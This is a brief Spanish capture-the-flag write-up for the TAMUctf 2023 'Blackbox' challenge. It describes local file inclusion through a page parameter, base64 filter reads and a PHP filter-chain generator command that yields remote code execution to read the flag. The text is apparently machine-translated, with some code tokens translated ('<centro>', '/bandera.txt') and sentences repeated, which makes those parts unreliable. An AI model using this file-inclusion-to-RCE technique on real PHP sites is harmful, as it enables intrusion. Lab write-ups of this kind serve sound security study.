TAMUctf 2023- Redacción de Blackbox
May 01 2023
Este desafío fue creado por Mr. Blade. Podemos ver que carga la página de inicio de sesión con el parámetro de página.
Este desafío es creado por Mr. Blade

Podemos ver que carga la página de inicio de sesión con el parámetro de página .
Vamos a enumerar los archivos. Primero probé con el administrador y usé codificadores base64.

Cuando decodificamos esto, podemos obtener la ruta para flag.txt
<centro>
<h1><?php include('/bandera.txt'); ?></h1>
</centro>
estoy usandohttps://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py
para obtener RCE.
python3 filter_chain.py — chain ‘<?php system(“cat /flag.txt”);?>’ | grep ‘^php*’ | xclip -selection clipboard

Gracias por leer.
¡Feliz hackeo!